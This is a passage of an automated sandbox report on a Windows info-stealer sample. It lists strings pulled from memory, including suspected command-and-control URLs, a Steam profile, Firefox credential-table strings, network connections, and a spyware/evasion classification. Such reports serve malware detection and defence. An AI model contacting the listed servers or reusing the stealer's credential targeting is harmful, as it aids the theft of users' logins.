                Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1530034448.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/C
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Uf
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A30000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apickc6
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apivZ
                Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/q6_e
                Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apil
                Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apin.txtPK
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steamp&c
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacebudi.lat:443/apigl
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat:443/api
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/7656119972433190066U
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.ste
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steamp
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampow
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscri
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1629739355.0000000000A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.comm
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sustainskelet.lat:443/api
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sweepyribs.lat:443/api%l
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcVcc
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603777248.0000000005280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: 0gnHF2twcT.exe, 00000000.00000003.1603918646.0000000005435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49714 version: TLS 1.2

                System Summary

                barindex
                Source: 0gnHF2twcT.exeStatic PE information: section name:
                Source: 0gnHF2twcT.exeStatic PE information: section name: .idata
                Source: 0gnHF2twcT.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A389B00_3_00A389B0
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A389B00_3_00A389B0
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A3DB280_3_00A3DB28
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A3DB280_3_00A3DB28
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A3DB280_3_00A3DB28
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A3DB280_3_00A3DB28
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A5C2000_3_00A5C200
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A389B00_3_00A389B0
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeCode function: 0_3_00A389B00_3_00A389B0
                Source: 0gnHF2twcT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0gnHF2twcT.exeStatic PE information: Section: ZLIB complexity 0.9973980629280822
                Source: 0gnHF2twcT.exeStatic PE information: Section: mimqpfga ZLIB complexity 0.9946124506039368
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 0gnHF2twcT.exe, 00000000.00000003.1557213361.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1557098653.0000000005201000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1578229101.000000000527C000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1578012510.00000000051EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 0gnHF2twcT.exeReversingLabs: Detection: 57%
                Source: 0gnHF2twcT.exeVirustotal: Detection: 54%
                Source: 0gnHF2twcT.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile read: C:\Users\user\Desktop\0gnHF2twcT.exeJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSection loaded: iphlpapi.dllJump to behavior
